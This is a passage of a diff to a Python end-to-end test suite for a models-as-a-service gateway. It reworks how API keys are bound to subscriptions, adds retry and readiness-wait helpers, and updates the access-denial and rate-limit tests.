name="e2e-default-key") + _default_api_key_cache[pid] = _create_api_key( + oc_token, + name="e2e-default-key", + subscription=SIMULATOR_SUBSCRIPTION, + ) return _default_api_key_cache[pid] @@ -253,10 +297,29 @@ def _delete_cr(kind, name, namespace=None): def _get_cr(kind, name, namespace=None): namespace = namespace or _ns() - result = subprocess.run(["oc", "get", kind, name, "-n", namespace, "-o", "json"], capture_output=True, text=True) - if result.returncode != 0: + max_retries = 3 + retry_delay = 2 + + for attempt in range(max_retries): + result = subprocess.run(["oc", "get", kind, name, "-n", namespace, "-o", "json"], capture_output=True, text=True) + + if result.returncode == 0: + return json.loads(result.stdout) + + # Retry transient errors + if attempt < 
max_retries - 1 and _is_transient_kubectl_error(result.stderr): + log.warning( + f"Transient kubectl error getting {kind}/{name} (attempt {attempt + 1}/{max_retries}): {result.stderr.strip()}" + ) + time.sleep(retry_delay * (attempt + 1)) + continue + + # Non-transient error or final attempt - return None (existing behavior) + log.error( + f"Failed to get {kind}/{name} in namespace '{namespace}' after {max_retries} retries. " + f"Last error: {result.stderr.strip()}" + ) return None - return json.loads(result.stdout) def _cr_exists(kind, name, namespace=None): @@ -336,7 +399,7 @@ def _sa_to_user(sa_name, namespace=None): return f"system:serviceaccount:{namespace}:{sa_name}" -def _create_test_maas_model(name, llmis_name="facebook-opt-125m-simulated", llmis_namespace="llm", namespace=None): +def _create_test_maas_model(name, llmis_name=MODEL_REF, llmis_namespace=MODEL_NAMESPACE, namespace=None): """Create a MaaSModelRef CR for testing. Note: MaaSModelRef can only reference backend models (LLMInferenceService) in the same namespace. @@ -392,7 +455,16 @@ def _create_test_auth_policy(name, model_refs, users=None, groups=None, namespac }) -def _create_test_subscription(name, model_refs, users=None, groups=None, token_limit=100, window="1m", namespace=None): +def _create_test_subscription( + name, + model_refs, + users=None, + groups=None, + token_limit=100, + window="1m", + namespace=None, + priority=None, +): """Create a MaaSSubscription CR for testing. 
Args: @@ -403,6 +475,7 @@ def _create_test_subscription(name, model_refs, users=None, groups=None, token_l token_limit: Token rate limit (default: 100) window: Rate limit window (default: "1m") namespace: Namespace for the subscription (defaults to _ns()) + priority: Optional spec.priority (higher wins for default API key binding when omitted) """ namespace = namespace or _ns() if not isinstance(model_refs, list): @@ -411,65 +484,44 @@ def _create_test_subscription(name, model_refs, users=None, groups=None, token_l # Convert groups list to required format: [{"name": "group1"}, {"name": "group2"}] groups_formatted = [{"name": g} for g in (groups or [])] - log.info("Creating MaaSSubscription: %s", name) - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSSubscription", - "metadata": {"name": name, "namespace": namespace}, - "spec": { - "owner": { - "users": users or [], - "groups": groups_formatted - }, - "modelRefs": [{ + spec = { + "owner": { + "users": users or [], + "groups": groups_formatted, + }, + "modelRefs": [ + { "name": ref, "namespace": MODEL_NAMESPACE, - "tokenRateLimits": [{"limit": token_limit, "window": window}] - } for ref in model_refs] - } - }) - + "tokenRateLimits": [{"limit": token_limit, "window": window}], + } + for ref in model_refs + ], + } + if priority is not None: + spec["priority"] = int(priority) -def _subscription_for_path(path): - """Return the X-MaaS-Subscription value for a given model path.""" - path = path or MODEL_PATH - if path == PREMIUM_MODEL_PATH: - return PREMIUM_SIMULATOR_SUBSCRIPTION - if path == MODEL_PATH: - return SIMULATOR_SUBSCRIPTION - return None # e.g. 
unconfigured model has no subscription + log.info("Creating MaaSSubscription: %s", name) + _apply_cr( + { + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": {"name": name, "namespace": namespace}, + "spec": spec, + } + ) -def _inference(api_key_or_token, path=None, extra_headers=None, subscription=None): - """Make an inference request using an API key or Bearer token. - - Args: - api_key_or_token: API key (sk-oai-xxx) or Bearer token for authorization - path: Model path (default: MODEL_PATH) - extra_headers: Additional headers to include - subscription: Subscription name, False to omit, or None to auto-detect - """ +def _inference(api_key, path=None, extra_headers=None, model_name=None): + """POST completions using an API key only (subscription is bound at mint).""" path = path or MODEL_PATH url = f"{_gateway_url()}{path}/v1/completions" - headers = {"Authorization": f"Bearer {api_key_or_token}", "Content-Type": "application/json"} - # Add X-MaaS-Subscription: extra_headers overrides; else explicit subscription; else infer from path. - # Pass subscription=False to explicitly omit the header (e.g. when testing no-subscription case). 
- sub_header = "x-maas-subscription" - if extra_headers and sub_header in extra_headers: - pass # extra_headers will set it - elif subscription is False: - pass # explicitly omit - elif subscription is not None: - headers[sub_header] = subscription - else: - inferred = _subscription_for_path(path) - if inferred: - headers[sub_header] = inferred + headers = {"Authorization": f"Bearer {api_key}", "Content-Type": "application/json"} if extra_headers: headers.update(extra_headers) return requests.post( url, headers=headers, - json={"model": MODEL_NAME, "prompt": "Hello", "max_tokens": 3}, + json={"model": model_name or MODEL_NAME, "prompt": "Hello", "max_tokens": 3}, timeout=TIMEOUT, verify=TLS_VERIFY, ) @@ -515,7 +567,124 @@ def _wait_for_maas_model_ready(name, namespace=None, timeout=120): ) -def _poll_status(token, expected, path=None, extra_headers=None, subscription=None, timeout=None, poll_interval=2): +def _wait_for_maas_auth_policy_ready(name, namespace=None, timeout=60): + """Wait for MaaSAuthPolicy to reach Active phase with enforced AuthPolicies. 
+ + Args: + name: Name of the MaaSAuthPolicy + namespace: Namespace (defaults to _ns()) + timeout: Maximum wait time in seconds (default: 60) + + Raises: + TimeoutError: If MaaSAuthPolicy doesn't become Active/enforced within timeout + """ + namespace = namespace or _ns() + deadline = time.time() + timeout + log.info(f"Waiting for MaaSAuthPolicy {name} to become Active (timeout: {timeout}s)...") + + while time.time() < deadline: + cr = _get_cr("maasauthpolicy", name, namespace) + if cr: + phase = cr.get("status", {}).get("phase") + auth_policies = cr.get("status", {}).get("authPolicies", []) + + # Check if all auth policies are accepted and enforced + all_enforced = all( + ap.get("accepted") == "True" and ap.get("enforced") == "True" + for ap in auth_policies + ) + + if phase == "Active" and auth_policies and all_enforced: + log.info(f"✅ MaaSAuthPolicy {name} is Active and enforced") + return + log.debug(f"MaaSAuthPolicy {name} phase: {phase}, authPolicies: {len(auth_policies)}, all_enforced: {all_enforced}") + time.sleep(2) + + # Timeout - log current state for debugging + cr = _get_cr("maasauthpolicy", name, namespace) + current_phase = cr.get("status", {}).get("phase") if cr else "not found" + auth_policies = cr.get("status", {}).get("authPolicies", []) if cr else [] + raise TimeoutError( + f"MaaSAuthPolicy {name} did not become Active/enforced within {timeout}s " + f"(current phase: {current_phase}, authPolicies: {len(auth_policies)})" + ) + + +def _wait_for_maas_subscription_ready(name, namespace=None, timeout=30): + """Wait for MaaSSubscription to reach Active phase. 
+ + Args: + name: Name of the MaaSSubscription + namespace: Namespace (defaults to _ns()) + timeout: Maximum wait time in seconds (default: 30) + + Raises: + TimeoutError: If MaaSSubscription doesn't become Active within timeout + """ + namespace = namespace or _ns() + deadline = time.time() + timeout + log.info(f"Waiting for MaaSSubscription {name} to become Active (timeout: {timeout}s)...") + + while time.time() < deadline: + cr = _get_cr("maassubscription", name, namespace) + if cr: + phase = cr.get("status", {}).get("phase") + if phase == "Active": + log.info(f"✅ MaaSSubscription {name} is Active") + return + log.debug(f"MaaSSubscription {name} phase: {phase}") + time.sleep(2) + + # Timeout - log current state for debugging + cr = _get_cr("maassubscription", name, namespace) + current_phase = cr.get("status", {}).get("phase") if cr else "not found" + raise TimeoutError( + f"MaaSSubscription {name} did not become Active within {timeout}s (current phase: {current_phase})" + ) + + +def _wait_for_token_rate_limit_policy(model_ref, model_namespace="llm", timeout=60): + """Wait for TokenRateLimitPolicy to be created and enforced for a model. 
+ + Args: + model_ref: Name of the model (e.g., "e2e-distinct-simulated") + model_namespace: Namespace where the TRLP should be created (default: "llm") + timeout: Maximum wait time in seconds (default: 60) + + Raises: + TimeoutError: If TRLP isn't created and enforced within timeout + """ + trlp_name = f"maas-trlp-{model_ref}" + deadline = time.time() + timeout + log.info(f"Waiting for TokenRateLimitPolicy {trlp_name} in {model_namespace} (timeout: {timeout}s)...") + + while time.time() < deadline: + result = subprocess.run( + ["oc", "get", "tokenratelimitpolicy", trlp_name, "-n", model_namespace, "-o", "json"], + capture_output=True, text=True + ) + if result.returncode == 0: + try: + trlp = json.loads(result.stdout) + conditions = trlp.get("status", {}).get("conditions", []) + # Check if TRLP is enforced + enforced = next((c for c in conditions if c.get("type") in ["Enforced", "Ready"]), None) + if enforced and enforced.get("status") == "True": + log.info(f"✅ TokenRateLimitPolicy {trlp_name} is enforced") + return + log.debug(f"TokenRateLimitPolicy {trlp_name} exists but not enforced yet") + except (json.JSONDecodeError, KeyError) as e: + log.debug(f"Failed to parse TRLP status: {e}") + else: + log.debug(f"TokenRateLimitPolicy {trlp_name} not found yet...") + time.sleep(3) + + raise TimeoutError( + f"TokenRateLimitPolicy {trlp_name} was not created and enforced in {model_namespace} within {timeout}s" + ) + + +def _poll_status(api_key, expected, path=None, extra_headers=None, model_name=None, timeout=None, poll_interval=2): """Poll inference endpoint until expected HTTP status or timeout.""" timeout = timeout or max(RECONCILE_WAIT * 3, 60) deadline = time.time() + timeout @@ -523,7 +692,7 @@ def _poll_status(token, expected, path=None, extra_headers=None, subscription=No last_err = None while time.time() < deadline: try: - r = _inference(token, path=path, extra_headers=extra_headers, subscription=subscription) + r = _inference(api_key, path=path, 
extra_headers=extra_headers, model_name=model_name) last_err = None ok = r.status_code == expected if isinstance(expected, int) else r.status_code in expected if ok: @@ -565,6 +734,22 @@ def _snapshot_cr(kind, name, namespace=None): return cr +def _is_transient_kubectl_error(stderr): + """Check if kubectl error is likely transient (network, timeout).""" + transient_patterns = [ + "TLS handshake timeout", + "connection refused", + "connection reset", + "i/o timeout", + "dial tcp", + "EOF", + "temporary failure", + "network is unreachable", + ] + stderr_lower = stderr.lower() + return any(pattern.lower() in stderr_lower for pattern in transient_patterns) + + def _list_crs(kind, namespace=None): """List all CRs of a given kind. @@ -586,14 +771,31 @@ def _list_crs(kind, namespace=None): }.get(kind, f"{kind}s") cmd = ["kubectl", "get", plural, "-n", namespace, "-o", "json"] - result = subprocess.run( - cmd, - capture_output=True, - text=True, - check=False - ) - if result.returncode != 0: + # Retry transient network errors with exponential backoff + max_retries = 3 + retry_delay = 2 # seconds + + for attempt in range(max_retries): + result = subprocess.run( + cmd, + capture_output=True, + text=True, + check=False + ) + + if result.returncode == 0: + return json.loads(result.stdout).get("items", []) + + # Check if error is transient and we have retries left + if attempt < max_retries - 1 and _is_transient_kubectl_error(result.stderr): + log.warning( + f"Transient kubectl error (attempt {attempt + 1}/{max_retries}): {result.stderr.strip()}" + ) + time.sleep(retry_delay * (attempt + 1)) # exponential backoff + continue + + # Final attempt or non-transient error raise RuntimeError( f"Failed to list {plural} in namespace '{namespace}'.\n" f"Command: {' '.join(cmd)}\n" @@ -602,20 +804,9 @@ def _list_crs(kind, namespace=None): f"Guidance: Ensure the CRD exists, namespace is correct, and you have permissions." 
) - return json.loads(result.stdout).get("items", []) - - -def _get_cr_annotations(kind, name, namespace="llm"): - """Return annotations dict of a CR, or None if not found.""" - result = subprocess.run( - ["oc", "get", kind, name, "-n", namespace, "-o", "json"], - capture_output=True, - text=True, - ) - if result.returncode != 0: - return None - obj = json.loads(result.stdout) - return obj.get("metadata", {}).get("annotations") or {} + # Unreachable: loop always exits via return (line 684) or raise (line 695) + # Included for type checker and defensive programming + return [] # --------------------------------------------------------------------------- @@ -667,6 +858,97 @@ def test_wrong_group_gets_403(self): assert r.status_code == 403, f"Expected 403, got {r.status_code}" +# Higher than typical default subscriptions (e.g. 0) so SelectHighestPriority picks this CR. +_E2E_API_KEY_BINDING_HIGH_PRIORITY = 100_000 + + +@pytest.fixture(scope="class") +def high_priority_subscription_name_for_api_key_binding(): + name = f"e2e-apikey-sub-binding-{uuid.uuid4().hex[:8]}" + ns = _ns() + try: + _create_test_subscription( + name, + MODEL_REF, + groups=["system:authenticated"], + priority=_E2E_API_KEY_BINDING_HIGH_PRIORITY, + ) + _wait_for_maas_subscription_ready(name, ns, timeout=90) + yield name + finally: + _delete_cr("maassubscription", name) + + +class TestAPIKeySubscriptionBinding: + """API key mint: default highest-priority subscription vs explicit subscription vs invalid name.""" + + def _api_keys_url(self) -> str: + return f"{_maas_api_url()}/v1/api-keys" + + def _auth_headers(self) -> dict: + return { + "Authorization": f"Bearer {_get_cluster_token()}", + "Content-Type": "application/json", + } + + def _revoke_key(self, key_id: str) -> None: + _revoke_api_key(_get_cluster_token(), key_id) + + def test_create_api_key_uses_highest_priority_subscription( + self, + high_priority_subscription_name_for_api_key_binding: str, + ): + """Omitting subscription binds the 
accessible subscription with highest spec.priority.""" + r = requests.post( + self._api_keys_url(), + headers=self._auth_headers(), + json={"name": f"test-key-high-prio-{uuid.uuid4().hex[:6]}"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert r.status_code in (200, 201), f"Expected 200/201, got {r.status_code}: {r.text}" + data = r.json() + assert data.get("subscription") == high_priority_subscription_name_for_api_key_binding, ( + f"Expected default bind to {high_priority_subscription_name_for_api_key_binding!r}, " + f"got {data.get('subscription')!r}" + ) + self._revoke_key(data["id"]) + + def test_create_api_key_with_explicit_simulator_subscription( + self, + high_priority_subscription_name_for_api_key_binding: str, + ): + """Explicit subscription in body should bind that subscription, not the highest-priority one.""" + designated = SIMULATOR_SUBSCRIPTION + r = requests.post( + self._api_keys_url(), + headers=self._auth_headers(), + json={"name": f"test-key-explicit-sub-{uuid.uuid4().hex[:6]}", "subscription": designated}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert r.status_code in (200, 201), f"Expected 200/201, got {r.status_code}: {r.text}" + data = r.json() + assert data.get("subscription") == designated + assert data.get("subscription") != high_priority_subscription_name_for_api_key_binding + self._revoke_key(data["id"]) + + @pytest.mark.usefixtures("high_priority_subscription_name_for_api_key_binding") + def test_create_api_key_nonexistent_subscription_errors(self): + """Unknown subscription name should fail with generic invalid_subscription.""" + bogus = f"e2e-no-such-subscription-{uuid.uuid4().hex}" + r = requests.post( + self._api_keys_url(), + headers=self._auth_headers(), + json={"name": f"test-key-bogus-sub-{uuid.uuid4().hex[:6]}", "subscription": bogus}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert r.status_code == 400, f"Expected 400, got {r.status_code}: {r.text}" + body = r.json() + assert body.get("code") == 
"invalid_subscription", body + + class TestSubscriptionEnforcement: """Tests that MaaSSubscription correctly enforces rate limits using API keys.""" @@ -678,9 +960,9 @@ def test_subscribed_user_gets_200(self): def test_auth_pass_no_subscription_gets_403(self): """API key with auth pass but no matching subscription should get 403. - + The AuthPolicy includes a subscription-error-check rule that calls - /v1/subscriptions/select. If no subscription matches the user's groups, + /internal/v1/subscriptions/select. If no subscription matches the user's groups, the request is denied with 403 "no matching subscription found for user". To test this, we temporarily add system:authenticated to the premium model's @@ -722,19 +1004,6 @@ def test_auth_pass_no_subscription_gets_403(self): _delete_cr("maasauthpolicy", "e2e-auth-pass-sub-fail") _wait_reconcile() - def test_invalid_subscription_header_gets_429(self): - """API key with invalid subscription header should get 429 or 403.""" - api_key = _get_default_api_key() - r = _inference(api_key, extra_headers={"x-maas-subscription": INVALID_SUBSCRIPTION}) - # Gateway may return 429 (rate limited) or 403 (forbidden) for invalid subscription - assert r.status_code in (429, 403), f"Expected 429 or 403, got {r.status_code}" - - def test_explicit_subscription_header_works(self): - """API key with explicit valid subscription header should work.""" - api_key = _get_default_api_key() - r = _inference(api_key, extra_headers={"x-maas-subscription": SIMULATOR_SUBSCRIPTION}) - assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text[:200]}" - def test_rate_limit_exhaustion_gets_429(self): """ Test that a user gets 429 when they actually exceed their token rate limit. @@ -779,8 +1048,13 @@ def test_rate_limit_exhaustion_gets_429(self): ) _wait_reconcile() - # 3. Get API key for testing - api_key = _get_default_api_key() + # 3. 
API key must be minted for this subscription + oc_token = _get_cluster_token() + api_key = _create_api_key( + oc_token, + name=f"e2e-rate-limit-{uuid.uuid4().hex[:8]}", + subscription=subscription_name, + ) # 4. Send requests to exhaust the limit # Calculate expected successful requests: token_limit / max_tokens = 15 / 3 = 5 @@ -792,7 +1066,7 @@ def test_rate_limit_exhaustion_gets_429(self): success_count = 0 for i in range(total_requests): - r = _inference(api_key, path=model_path, subscription=subscription_name) + r = _inference(api_key, path=model_path) request_num = i + 1 log.info(f"Request {request_num}/{total_requests}: {r.status_code}") @@ -876,31 +1150,6 @@ def test_user_in_one_of_two_subscriptions_gets_200(self): _wait_reconcile() - def test_multi_tier_auto_select_highest(self): - """With 2 tiers for the same model, API key in both should still get access. - (Verifies multiple overlapping subscriptions don't break routing.)""" - ns = _ns() - try: - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSSubscription", - "metadata": {"name": "e2e-high-tier", "namespace": ns}, - "spec": { - "owner": {"groups": [{"name": "system:authenticated"}]}, - "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 9999, "window": "1m"}]}], - }, - }) - - api_key = _get_default_api_key() - _poll_status(api_key, 200, extra_headers={"x-maas-subscription": "e2e-high-tier"}) - - r2 = _inference(api_key) - assert r2.status_code == 200, f"Expected 200 with auto-select, got {r2.status_code}" - finally: - _delete_cr("maassubscription", "e2e-high-tier") - _wait_reconcile() - - class TestMultipleAuthPoliciesPerModel: """Multiple auth policies for one model aggregate with OR logic.""" @@ -930,9 +1179,13 @@ def test_two_auth_policies_or_logic(self): }) _wait_reconcile() - # Default API key (inherits user's system:authenticated group) should now work - api_key = _get_default_api_key() - r = _poll_status(api_key, 200, 
path=PREMIUM_MODEL_PATH, subscription="e2e-premium-sa-sub") + # Key must be minted for the premium subscription + api_key = _create_api_key( + _get_cluster_token(), + name=f"e2e-premium-sa-{uuid.uuid4().hex[:8]}", + subscription="e2e-premium-sa-sub", + ) + r = _poll_status(api_key, 200, path=PREMIUM_MODEL_PATH, timeout=30) log.info(f"API key with 2nd auth policy -> premium: {r.status_code}") finally: _delete_cr("maassubscription", "e2e-premium-sa-sub") @@ -994,22 +1247,19 @@ def test_delete_subscription_rebuilds_trlp(self): _delete_cr("maassubscription", "e2e-temp-sub") def test_delete_last_subscription_denies_access(self): - """Delete all subscriptions for a model -> access denied (403 or 429). - - When the last subscription is deleted, access is denied. The exact code - depends on which policy evaluates first: - - 403: AuthPolicy's subscription-error-check denies (no subscription found) - - 429: Default-deny TRLP with 0 tokens kicks in - - Both indicate the intended behavior: no subscription = no access. + """Delete all subscriptions for a model -> access denied with 403 Forbidden. + + When the last subscription is deleted, AuthPolicy's subscription validation + fails (no subscriptions found for user) and returns 403 Forbidden before + the request reaches TokenRateLimitPolicy. 
""" api_key = _get_default_api_key() original = _snapshot_cr("maassubscription", SIMULATOR_SUBSCRIPTION) assert original, f"Pre-existing {SIMULATOR_SUBSCRIPTION} not found" try: _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION) - # With no subscription, expect either 403 or 429 (both = access denied) - r = _poll_status(api_key, [403, 429], subscription=False, timeout=30) + # With no subscription, expect 403 from AuthPolicy subscription validation + r = _poll_status(api_key, 403, timeout=30) log.info(f"No subscriptions -> {r.status_code} (access denied as expected)") finally: _apply_cr(original) @@ -1031,10 +1281,7 @@ def test_subscription_before_auth_policy(self): """Create subscription first, then auth policy -> should work once both exist.""" ns = _ns() try: - # Get the default API key (inherits user's groups including system:authenticated) - api_key = _get_default_api_key() - - # Create subscription first (for system:authenticated group) + # Subscription CR must exist before minting a key bound to it _apply_cr({ "apiVersion": "maas.opendatahub.io/v1alpha1", "kind": "MaaSSubscription", @@ -1045,9 +1292,16 @@ def test_subscription_before_auth_policy(self): }, }) _wait_reconcile() + _wait_for_maas_subscription_ready("e2e-ordering-sub", namespace=ns, timeout=90) + + api_key = _create_api_key( + _get_cluster_token(), + name=f"e2e-ordering-{uuid.uuid4().hex[:8]}", + subscription="e2e-ordering-sub", + ) # Without auth policy for system:authenticated on premium model, request should fail with 403 - r1 = _inference(api_key, path=PREMIUM_MODEL_PATH, subscription="e2e-ordering-sub") + r1 = _inference(api_key, path=PREMIUM_MODEL_PATH) log.info(f"Sub only (no auth policy) -> {r1.status_code}") assert r1.status_code == 403, f"Expected 403 (no auth policy yet), got {r1.status_code}" @@ -1063,7 +1317,7 @@ def test_subscription_before_auth_policy(self): }) # Now it should work - r2 = _poll_status(api_key, 200, path=PREMIUM_MODEL_PATH, subscription="e2e-ordering-sub") + r2 = 
_poll_status(api_key, 200, path=PREMIUM_MODEL_PATH) log.info(f"Sub + auth policy -> {r2.status_code}") finally: _delete_cr("maassubscription", "e2e-ordering-sub") @@ -1078,7 +1332,7 @@ def test_authpolicy_managed_false_prevents_update(self): """AuthPolicy annotated with opendatahub.io/managed=false must not have its spec updated when the parent MaaSAuthPolicy is modified.""" ns = _ns() - ap_ns = "llm" + ap_ns = MODEL_NAMESPACE parent_snapshot = None try: # 1. Verify the AuthPolicy exists @@ -1172,7 +1426,7 @@ def test_trlp_managed_false_prevents_update(self): """TokenRateLimitPolicy annotated with opendatahub.io/managed=false must not have its spec updated when the parent MaaSSubscription is modified.""" ns = _ns() - trlp_ns = "llm" + trlp_ns = MODEL_NAMESPACE parent_snapshot = None try: # 1. Verify the TRLP exists @@ -1273,128 +1527,19 @@ def test_trlp_managed_false_prevents_update(self): _wait_reconcile() -class TestMaasSubscriptionNamespace: - """Verifies MaaS controller reconciles CRs from any namespace (namespace scoping support).""" - - def test_authpolicy_and_subscription_in_maas_subscription_namespace(self): - """MaaSAuthPolicy and MaaSSubscription in MaaS subscription namespace should be reconciled - and should appear in the AuthPolicy and TRLP annotations for the model.""" - ns = _ns() - try: - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSAuthPolicy", - "metadata": {"name": "e2e-watched-auth", "namespace": ns}, - "spec": { - "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}], - "subjects": {"groups": [{"name": "system:authenticated"}]}, - }, - }) - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSSubscription", - "metadata": {"name": "e2e-watched-sub", "namespace": ns}, - "spec": { - "owner": {"groups": [{"name": "system:authenticated"}]}, - "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}], - }, - }) - 
_wait_reconcile(30) - - auth_name = f"maas-auth-{MODEL_REF}" - auth_annotations = _get_cr_annotations("authpolicy", auth_name, "llm") - assert auth_annotations is not None, ( - f"AuthPolicy {auth_name} not found" - ) - assert "e2e-watched-auth" in auth_annotations.get("maas.opendatahub.io/auth-policies", "").split(","), ( - "MaaSAuthPolicy e2e-watched-auth not reconciled" - ) - - trlp_name = f"maas-trlp-{MODEL_REF}" - trlp_annotations = _get_cr_annotations("tokenratelimitpolicy", trlp_name, "llm") - assert trlp_annotations is not None, ( - f"TRLP {trlp_name} not found" - ) - assert "e2e-watched-sub" in trlp_annotations.get("maas.opendatahub.io/subscriptions", "").split(","), ( - "MaaSSubscription e2e-watched-sub not reconciled" - ) - finally: - _delete_cr("maasauthpolicy", "e2e-watched-auth") - _delete_cr("maassubscription", "e2e-watched-sub") - _wait_reconcile() - - def test_authpolicy_and_subscription_in_another_namespace(self): - """MaaSAuthPolicy and MaaSSubscription in another namespace should not be reconciled - and should not appear in the AuthPolicy and TRLP annotations for the model.""" - ns = "e2e-unwatched-ns" - subprocess.run( - ["oc", "create", "namespace", ns], - capture_output=True, - text=True, - check=False, - ) - try: - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSAuthPolicy", - "metadata": {"name": "e2e-unwatched-auth", "namespace": ns}, - "spec": { - "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}], - "subjects": {"groups": [{"name": "system:authenticated"}]}, - }, - }) - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSSubscription", - "metadata": {"name": "e2e-unwatched-sub", "namespace": ns}, - "spec": { - "owner": {"groups": [{"name": "system:authenticated"}]}, - "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}], - }, - }) - _wait_reconcile(30) - - auth_name = f"maas-auth-{MODEL_REF}" - auth_annotations = 
_get_cr_annotations("authpolicy", auth_name, "llm") - assert auth_annotations is not None, ( - f"AuthPolicy {auth_name} not found" - ) - assert "e2e-unwatched-auth" not in auth_annotations.get("maas.opendatahub.io/auth-policies", "").split(","), ( - "MaaSAuthPolicy e2e-unwatched-auth not reconciled (namespace scoping should not allow this)" - ) - - trlp_name = f"maas-trlp-{MODEL_REF}" - trlp_annotations = _get_cr_annotations("tokenratelimitpolicy", trlp_name, "llm") - assert trlp_annotations is not None, ( - f"TRLP {trlp_name} not found" - ) - assert "e2e-unwatched-sub" not in trlp_annotations.get("maas.opendatahub.io/subscriptions", "").split(","), ( - "MaaSSubscription e2e-unwatched-sub not reconciled (namespace scoping should not allow this)" - ) - finally: - _delete_cr("maasauthpolicy", "e2e-unwatched-auth", namespace=ns) - _delete_cr("maassubscription", "e2e-unwatched-sub", namespace=ns) - _wait_reconcile() - subprocess.run( - ["oc", "delete", "namespace", ns, "--ignore-not-found", "--timeout=30s"], - capture_output=True, - text=True, - ) - - class TestE2ESubscriptionFlow: """ End-to-end tests that create MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription from scratch and validate the complete subscription flow. - Each test creates all necessary CRs and validates one scenario: - 1. Token with both access (MaaSAuthPolicy) and subscription → 200 OK - 2. Token with access but no subscription → 403 Forbidden - 3. Token with subscription but not in MaaSAuthPolicy → 403 Forbidden - 4. Token with single subscription + no header → auto-select (200 OK) - 5. Token with multiple subscriptions + no header → 403 Forbidden - 6. Token with multiple subscriptions + valid header → 200 OK - 7. Token with multiple subscriptions + invalid header → 403 Forbidden + Each test creates all necessary CRs and validates one scenario (gateway inference uses + API keys only; subscription is chosen at mint via POST /v1/api-keys): + 1. 
API key with both access and bound subscription → 200 OK + 2. API key bound to subscription that is then removed → 403 Forbidden (auth still passes) + 3. API key with subscription but no auth → 403 Forbidden + 4. Single subscription for user + mint without explicit subscription → 200 OK + 5. Two subscriptions: separate keys minted for each → 200 OK for each + 6. Mint API key for another user's subscription → 400 invalid_subscription """ @@ -1484,12 +1629,14 @@ def test_e2e_with_both_access_and_subscription_gets_200(self): _wait_reconcile() - # Create API key for inference - api_key = _create_api_key(oc_token, name=f"{sa_name}-key") + # API key bound to this subscription at mint (inference does not send x-maas-subscription) + api_key = _create_api_key( + oc_token, name=f"{sa_name}-key", subscription=subscription_name + ) # Test: Both access and subscription → 200 log.info("Testing: API key with both access and subscription") - r = _poll_status(api_key, 200, path=model_path, subscription=subscription_name, timeout=90) + r = _poll_status(api_key, 200, path=model_path, timeout=90) log.info("✅ Both access and subscription → %s", r.status_code) finally: @@ -1522,19 +1669,19 @@ def test_e2e_with_access_but_no_subscription_gets_403(self): # Create auth policy for this specific user _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user]) - # Delete simulator-subscription so user has no matching subscriptions - # (otherwise SA matches via system:authenticated group) - _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION) + # Bind simulator subscription on the key while the CR still exists, then remove it + api_key = _create_api_key( + oc_token, + name=f"{sa_name}-key", + subscription=SIMULATOR_SUBSCRIPTION, + ) + _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION) _wait_reconcile() - # Create API key for inference - api_key = _create_api_key(oc_token, name=f"{sa_name}-key") - - # Test: Auth passes but no subscription → 403 (not in any subscription) - 
log.info("Testing: API key with access but no subscription") - r = _poll_status(api_key, 403, path=MODEL_PATH, subscription=False, timeout=90) - log.info("✅ Access but no subscription → %s", r.status_code) + log.info("Testing: API key after subscription removed (auth still passes)") + r = _poll_status(api_key, 403, path=MODEL_PATH, timeout=90) + log.info("✅ Access but no live subscription for bound key → %s", r.status_code) finally: # Restore simulator-subscription first @@ -1580,12 +1727,15 @@ def test_e2e_with_subscription_but_no_access_gets_403(self): _wait_reconcile() - # Create API key for the user with subscription but no auth - api_key_with_sub = _create_api_key(oc_token_with_sub, name=f"{sa_with_sub}-key") + api_key_with_sub = _create_api_key( + oc_token_with_sub, + name=f"{sa_with_sub}-key", + subscription=subscription_name, + ) # Test: Subscription but no access → 403 log.info("Testing: API key with subscription but no access") - r = _poll_status(api_key_with_sub, 403, path=MODEL_PATH, subscription=subscription_name, timeout=90) + r = _poll_status(api_key_with_sub, 403, path=MODEL_PATH, timeout=90) log.info("✅ Subscription but no access → %s", r.status_code) finally: @@ -1627,12 +1777,11 @@ def test_e2e_single_subscription_auto_selects(self): _create_test_subscription(subscription_name, MODEL_REF, users=[sa_user]) _wait_reconcile() - # Create API key for inference + # Exactly one subscription for this user → mint can auto-bind it without explicit name api_key = _create_api_key(oc_token, name=f"{sa_name}-key") - # Test: Single subscription + no header → auto-select → 200 - log.info("Testing: Single subscription auto-select") - r = _poll_status(api_key, 200, path=MODEL_PATH, subscription=False, timeout=90) + log.info("Testing: Single subscription auto-select at mint") + r = _poll_status(api_key, 200, path=MODEL_PATH, timeout=90) log.info("✅ Single subscription auto-select → %s", r.status_code) finally: @@ -1644,62 +1793,12 @@ def 
